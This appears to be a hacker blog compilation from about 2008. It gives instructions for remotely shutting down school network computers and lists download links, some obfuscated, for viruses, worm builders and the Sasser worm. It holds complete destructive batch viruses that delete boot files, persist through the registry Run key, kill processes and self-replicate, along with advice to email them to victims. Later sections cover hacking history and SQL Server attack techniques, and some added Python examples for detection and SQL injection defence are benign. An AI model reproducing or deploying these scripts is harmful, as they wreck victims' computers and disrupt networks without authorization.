You wanna mess around with your school network?
You wanna own the shit out of some kiddies who think they're the best?
Well thankfully there's the shutdown command in cmd.
First of all you need access to a cmd prompt on the network for this to work.
If it's disabled you can obviously run everything from .bat files.
So first type in
Code:
net view
This will list the names of all the computers on the network.
Then find a target and write its name down; for example, if a name is \\045-comproom1-05 you will use that name to shut the computer down.
What next? Well if you're a lil skiddy yourself then the easiest thing to do is type in
Code:
shutdown -i
which gives you a GUI where you can shut down whichever computer you want, set a timer, and even throw in a funny comment like "owned" or somethin.
The commands you will use if you just want the command-line interface are
Code:
shutdown -s -m \\computername
- shuts down the PC.
Code:
shutdown -s -m \\computername -c "owned"
- shutdown with a comment.
Code:
shutdown -l
- logs off the current user.
Code:
shutdown -r
- restarts the computer.
and so on...
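What this looks like from the other side, as an added example that is not part of the original post: a remote `shutdown -m` lands on the target as a System-log Event ID 1074 whose process field names the initiating machine, and the `-c` text shows up as the Comment. The Python below parses constructed sample 1074 records (host names and users are invented) and flags the ones whose origin host differs from the computer that was shut down. Remote shutdown only works where the caller holds the "Force shutdown from a remote system" user right on the target, which is why restricting that right is the usual fix.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample records from the System log, Event ID 1074, in the
# wording Windows uses for that event. Hosts and users are invented.
SAMPLE_1074 = [
    "1074 | The process C:\\Windows\\Explorer.EXE (LAB-PC-05) has initiated the "
    "restart of computer LAB-PC-05 on behalf of user LAB\\student for the "
    "following reason: Other (Unplanned) Reason Code: 0x0 "
    "Shutdown Type: restart Comment: ",
    "1074 | The process C:\\Windows\\system32\\shutdown.exe (LAB-PC-12) has "
    "initiated the shutdown of computer LAB-PC-05 on behalf of user "
    "LAB\\student for the following reason: No title for this reason could be "
    "found Reason Code: 0x800000ff Shutdown Type: shutdown Comment: owned",
    "1074 | The process C:\\Windows\\uus\\amd64\\MoUsoCoreWorker.exe (LAB-PC-05) "
    "has initiated the restart of computer LAB-PC-05 on behalf of user "
    "NT AUTHORITY\\SYSTEM for the following reason: Operating System: Service "
    "pack (Planned) Reason Code: 0x80020010 Shutdown Type: restart Comment: ",
    "6005 | The Event log service was started.",
]

# Field layout of the 1074 message: process (with the originating host in
# parentheses), action, target computer, user, and the free-text comment,
# which is the string given to shutdown -c.
MSG_1074 = re.compile(
    r"The process (?P<process>.+?) \((?P<origin>[^)]+)\) has initiated the "
    r"(?P<action>\w+) of computer (?P<target>\S+) on behalf of user "
    r"(?P<user>.+?) for the following reason: .*?"
    r"Shutdown Type: (?P<type>\w+) Comment: (?P<comment>.*)$"
)


@dataclass
class ShutdownEvent:
    origin: str   # host named in the process field, i.e. where the request came from
    target: str   # computer that was shut down or restarted
    user: str
    action: str
    process: str
    comment: str

    @property
    def remote(self) -> bool:
        # A shutdown issued with -m \\target is recorded on the target with the
        # caller's host name in the process field, so origin != target.
        return self.origin.upper() != self.target.upper()


def parse_1074(line: str) -> Optional[ShutdownEvent]:
    """Parse one 'eventid | message' line; None for anything that is not a 1074."""
    event_id, _, message = line.partition(" | ")
    if event_id.strip() != "1074":
        return None
    m = MSG_1074.search(message)
    if not m:
        return None
    return ShutdownEvent(
        origin=m["origin"], target=m["target"], user=m["user"],
        action=m["action"], process=m["process"], comment=m["comment"].strip(),
    )


def find_remote_shutdowns(lines: List[str]) -> List[ShutdownEvent]:
    """Return the 1074 events whose initiating host is not the machine itself."""
    events = (parse_1074(line) for line in lines)
    return [ev for ev in events if ev is not None and ev.remote]


if __name__ == "__main__":
    for ev in find_remote_shutdowns(SAMPLE_1074):
        print(f"{ev.action} of {ev.target} initiated from {ev.origin} "
              f"by {ev.user} via {ev.process}; comment={ev.comment!r}")
```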
Sunday, April 13, 2008
online downloadable virus list!!
Awesome Virus 2..!!..Njoy..!!
WARNING: Do NOT open this on your own computer!!
This is how the virus works:
first it will change the color of the cmd box
then it will change the time on the computer to midnight, 12:00
then it will shut down the antivirus and firewall
and copy itself into the startup menu and registry
after that it will change its own attributes to hidden and read-only
so the victim can't remove the virus
after that it will kill processes such as MSN, LimeWire,
Internet Explorer, Firefox, etc.
then it will split itself 20 times and flood the WINDOWS folder
It will then delete everything from the Windows folder and System32, then completely erase the WHOLE C drive,
and finally it will shut itself down, and by the time the computer has restarted it will be useless, as it will have deleted EVERYTHING including the Windows login screen.
Here's the download:
http://rapidshare.com/files/74221720/shroom.zip.html
P.S. Batch viruses are a bitch to send over MSN, so I would advise you to upload it to a website and let the victim download the file.
A DOS virus builder
h@@p://rapidshare.com/files/65701348/vc.zip [Replace @@ with tt]
====================
Nice, easy worm generator that will spread through network shares and emails; it scans for email addresses, has an IRC bot and more options.
http://rapidshare.com/files/65704232/Pokes-Worm-Gen-2.zip
====================
Builds a worm and adds spread options like email or mIRC; then you choose what to infect on computers, change PC name, go-to-URL option, anti-deletion, polymorphic and other shit.
http://rapidshare.com/files/65701343/vbswg2.zip
====================
This little program allows you to add source code and generate your own worm/virus; it has some samples of code inside the zip too.
http://rapidshare.com/files/65702742/Dr._VBS_Virus_Maker.zip
====================
Awesome Virus...!!
WARNING: Do NOT open this on your own computer!!
It will disable your firewall and do a lot of funny things; if you still want to see funny things, please try it.
http://rapidshare.com/files/78696248/Smile.exe.html
It will display a message "I love dlls", then flood their desktop with DLLs, and also the directories "C:/Windows/" and "C:/Windows/System32/". It also disables Ctrl+Alt+Delete in WinXP.
h@@p://rapidshare.com/files/65703684/MXZ.zip
===================
It will infect .COM or .EXE files as they are opened, executed, or their attributes are accessed. Also, if the system time is 12:00am, the virus will delete any file executed.
h@@p://rapidshare.com/files/65703373/massacre.zip
===================
The famous worm that fucked up millions of computers around the world; it started in Germany, where it was programmed by an 18-year-old man.
h@@p://rapidshare.com/files/65700942/sasser.b.zip
===================
Plz notify if the link is broken or is detectable.
Replace @@ with tt.
:::::::::::: NEXT BAT FILE VIRUS :::::::::::::::::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Save it as a .bat file in Notepad!!
This will pop up a message saying OWNED!!
and shut down the computer, never to reboot again!
Type this in Notepad:
start virus.bat
virus.bat
and save it with this name:
virus.bat
Your antivirus will not detect this virus.
Basically this program will delete all the files which are needed for booting.
::::::::Virus & Trick Centre :::::::::: BATCH FILE VIRUS
Copy the code below and paste it into Notepad, then save as anyname.bat.
Do not click on that batch file. Send it to your enemies' email.
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide itself and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
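Both write-ups above (the "Awesome Virus 2" behaviour list and the R.I.P batch file) describe the same handful of behaviours: self-copy via %0, a Run-key entry, hidden/read-only attributes, killing security or messaging processes, resetting the clock, and forcing a shutdown or restart. That makes static triage of a .bat file straightforward. The Python below is an added example, not code from the original posts: it turns those behaviours into regex indicators and scores two constructed scripts, a benign backup job and a stripped-down copy of the persistence skeleton above, so that a script with one or two ordinary admin commands is not flagged; the netsh/net stop patterns are an assumption, since the posts describe disabling the firewall and antivirus without showing the commands.

```python
import re
from typing import Dict, List, Tuple

# Behaviour indicators taken from the descriptions above: (name, regex),
# applied case-insensitively, line by line, to the script text.
INDICATORS: List[Tuple[str, str]] = [
    ("self_copy",           r"\bcopy\s+%0\b"),
    ("run_key_persistence", r"\breg\s+add\b.*\\CurrentVersion\\Run\b"),
    ("hide_attributes",     r"\battrib\s+(?:\+[rsh]\s*)+"),
    ("process_kill",        r"\b(?:tskill|taskkill)\b"),
    # Assumed commands for "shuts down the antivirus and firewall".
    ("security_tamper",     r"\bnetsh\s+(?:adv)?firewall\b|\bnet\s+stop\b"),
    ("clock_tamper",        r"^\s*time\s+\d{1,2}:\d{2}"),
    ("boot_file_deletion",  r"\bdel\b.*\\(?:boot\.ini|ntldr|win\.ini|autoexec\.bat)\b"),
    ("replication_loop",    r"\bcopy\b.*%random%"),
    ("forced_shutdown",     r"\bshutdown\b.*\s[-/][srf]\b"),
    ("mouse_swap",          r"SwapMouseButton"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE | re.MULTILINE))
            for name, rx in INDICATORS]

# Distinct behaviours needed before a script is flagged. One or two of these
# (a shutdown, a read-only attribute) are everyday admin scripting.
SUSPICIOUS_THRESHOLD = 3

# Constructed benign sample: a lab backup job that powers the machine down.
BENIGN_BAT = r"""@echo off
rem nightly backup of the lab share, then power the machine down
xcopy /s /y D:\shares\lab E:\backup\lab > nul
attrib +r E:\backup\lab\*.* /s
shutdown -s -t 600 -c "Backup finished, lab closes in 10 minutes"
"""

# Constructed suspicious sample: the persistence and self-replication
# skeleton of the R.I.P script above, with its destructive lines removed.
SUSPICIOUS_BAT = r"""@echo off
copy %0 %systemroot%\Greatgame.bat > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ /d %systemroot%\Greatgame.bat /f > nul
attrib +r +h %systemroot%\Greatgame.bat
tskill NMain
time 12:00
:loop
copy %0 %random%.bat
goto loop
"""


def triage_batch(script: str) -> Dict[str, object]:
    """Return the distinct indicator names found in a batch script, their
    count, and whether the count crosses the threshold."""
    hits = sorted(name for name, rx in COMPILED if rx.search(script))
    return {"indicators": hits, "score": len(hits),
            "suspicious": len(hits) >= SUSPICIOUS_THRESHOLD}


def is_suspicious(script: str) -> bool:
    return bool(triage_batch(script)["suspicious"])


if __name__ == "__main__":
    for label, text in [("benign", BENIGN_BAT), ("suspicious", SUSPICIOUS_BAT)]:
        r = triage_batch(text)
        print(f"{label:10} score={r['score']} flagged={r['suspicious']} {r['indicators']}")
```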
Biggest Hacks Of All Time....!!
Early 1990s
Kevin Mitnick, often incorrectly called the god of hackers by many, broke into the computer systems of the world's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking; instead he called it social engineering.
November 2002
Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a "fast-track extradition" to the US where he is a wanted man. The next hearing in the case is slated for today.
1995
Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online: he was the first person to hack into a bank to extract money. In early 1995 he hacked into Citibank and robbed $10 million. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the US, Finland, Holland, Germany and Israel.
1990
When a Los Angeles area radio station announced a contest that awarded a Porsche 944S2 to the 102nd caller, Kevin Poulsen took control of the entire city's telephone network, ensured he was the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News.
1983
Kevin Poulsen again. A little-known incident: Poulsen, then just a student, hacked into Arpanet, the precursor to the Internet. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network.
Mar 11
1996
US hacker Timothy Lloyd planted six lines of malicious software code in the computer network of Omega Engineering which was a prime supplier of components for NASA and the US Navy. The code allowed a "logic bomb" to explode that deleted software running Omega's ma
Top 10 tricks to exploit SQL Server Systems
Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results.
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector.
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe comes in.
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break-in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
Credits for reconciling the 10 techniques: Rani tha
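Items 6, 7 and 9 share one root cause: a query assembled from user input by string concatenation, with the database's own error text echoed to the client. The Python below is an added example, not part of the article: it runs a login check against an in-memory SQLite database in both the vulnerable and the parameterized form. SQLite stands in for SQL Server here, so the leaked error wording differs from the "Incorrect syntax near" the article quotes, but the behaviour is the same.

```python
import sqlite3
from typing import Optional, Tuple

# (status, detail): status is "ok", "denied" or "error".
Result = Tuple[str, Optional[str]]


def make_db() -> sqlite3.Connection:
    """Constructed sample data; the plaintext password column only keeps the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, pw: str) -> Result:
    """Query built by concatenation, the pattern the article's item 6 describes.

    Two defects: user input becomes SQL syntax, and the driver's error text is
    handed straight back to the caller (the leaked error messages of item 9).
    """
    sql = f"SELECT name FROM users WHERE name = '{user}' AND password = '{pw}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", row[0]) if row else ("denied", None)


def login_hardened(conn: sqlite3.Connection, user: str, pw: str) -> Result:
    """Same check with bound parameters and a generic error message.

    The input reaches the driver as data, so quotes and comment markers in it
    can never change the query's structure; the real exception text belongs in
    the server log, not in the response.
    """
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    try:
        row = conn.execute(sql, (user, pw)).fetchone()
    except sqlite3.Error:
        return ("error", "login unavailable")
    return ("ok", row[0]) if row else ("denied", None)


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("alice", "correct horse"), ("alice' --", "anything"), ("O'Brien", "x")]:
        print(f"{user!r:14} vulnerable={login_vulnerable(db, user, pw)} "
              f"hardened={login_hardened(db, user, pw)}")
```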